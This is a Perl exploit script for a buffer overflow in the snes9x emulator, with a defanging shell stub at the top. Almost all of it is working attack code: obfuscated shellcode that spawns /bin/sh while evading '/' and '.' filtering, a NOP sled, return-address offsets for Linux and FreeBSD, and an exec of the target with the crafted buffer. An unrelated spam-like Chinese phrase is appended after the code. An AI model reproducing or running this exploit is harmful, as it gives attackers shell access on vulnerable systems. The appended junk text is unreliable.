#!/bin/sh echo DEFANGED.3 exit #!/usr/bin/perl # # snes9x exploit written by zillion@safemode.org # # (safemode.org) while($_ = $ARGV[0], /^-/) { shift; last if /^--$/; /^-l/ && do { $esp = 0xbfffaadc; }; /^-f/ && do { $esp = 0xbfbfab4c; }; } if(!$esp) { &usage; } ############################################################################# # Home brewn shellcode that does an execve of /bin/sh. Because the buffer # if being filtered for '/' and '.' the shellcode has -bin-sh in it. The '-' # chars are changed to '/' at runtime ! (hint, check inc and man ascii) $shellcode = "\xeb\x33\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x89\x76\x0b\x8d". "\x5e\x08\x89\x5e\x0f\x89\x46\x13\x8a\x06\xfe\xc0\xfe\xc0\x88". "\x06\x8a\x46\x04\xfe\xc0\xfe\xc0\x88\x46\x04\xb0\x0b\x89\xf3". "\x8d\x4e\x0b\x8d\x56\x13\xcd\x80\xe8\xc8\xff\xff\xff\x2d\x62". "\x69\x6e\x2d\x73\x68\x23\x2d\x69\x23\x41\x41\x41\x41\x42\x42". "\x42\x42\x43\x43\x43\x43"; ############################################################################# # Preparation of the stuff we will put in our buffer $buf = 87; $rest = 4002; $nop = "\x90"; $offset = 1000; for ($i = 0; $i < ($buf - 16); $i++) { $buffer .= $nop; } $new_ret = pack('l', ($esp + $offset)); for ($i = 0; $i < 16; $i += 4) { $buffer .= $new_ret; } for ($i = 0; $i < ($rest - length($shellcode)); $i++) { $buffer .= $nop; } $buffer .= $shellcode; ############################################################################# # Done ! now let kick some ass ! print("New return address: 0x", sprintf('%lx',($esp + $offset)), "\n"); exec("./snes9x '$buffer'"); sub usage { print "\nLinux usage: $0 -l\nFreeBSD usage: $0 -f\n\n"; exit; }

亚洲欧美在线